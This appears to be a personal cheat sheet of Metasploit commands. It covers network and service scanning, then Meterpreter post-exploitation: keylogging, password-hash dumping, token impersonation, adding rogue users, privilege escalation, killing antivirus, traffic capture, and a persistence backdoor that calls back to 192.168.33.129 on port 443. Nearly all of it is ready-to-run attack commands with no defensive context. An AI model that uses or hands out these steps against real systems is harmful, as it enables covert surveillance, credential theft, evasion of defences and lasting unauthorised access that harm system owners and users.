Metasploit

Programmer's Notes [metasploit]

1. Active Information Gathering

  • TCP idle scan: use auxiliary/scanner/ip/ipidseq
    Finds hosts whose IP ID increments predictably; use one as the zombie with nmap: nmap -PN -sI <idle host> <target host>

  • smb_version scan: used to discover operating system information
    scanner/smb/smb_version

  • MSSQL scan
    use scanner/mssql/mssql_ping
  • SSH scan
    use scanner/ssh/ssh_version
  • FTP: scanner/ftp/anonymous
  • SNMP: scanner/snmp/snmp_login

2. Vulnerability Scanning

  • smb_login: use auxiliary/scanner/smb/smb_login
  • VNC scan: use auxiliary/scanner/vnc/vnc_none_auth

3. Meterpreter

  • Screenshot: screenshot
  • System information: sysinfo
  • Keylogging:
    1. migrate into the explorer.exe process
    2. run post/windows/capture/keylog_recorder
  • Dump hashes:
      use priv
      run post/windows/gather/hashdump
  • Token theft (impersonation):
    1. use incognito
    2. list_tokens -u
    3. impersonate_token <tokenname>
    4. Add a user: add_user <username> <password> -h <host>
    5. Add the user to a group: add_group_user <group> <user> -h <host>
  • Privilege escalation: use priv, then getsystem

  • VNC: run vnc
  • Migrate: run post/windows/manage/migrate
  • Kill AV: run killav
  • View traffic: run packetrecorder -i 1
  • Collect system information: run scraper
  • Persistence: run persistence -X -i 50 -p 443 -r 192.168.33.129
  • Win API calls via Railgun (arguments are hWnd, text, caption, type):
      irb
      client.railgun.user32.MessageBoxA(0, "hello", "world", "MB_OK")

Use with the Veil framework
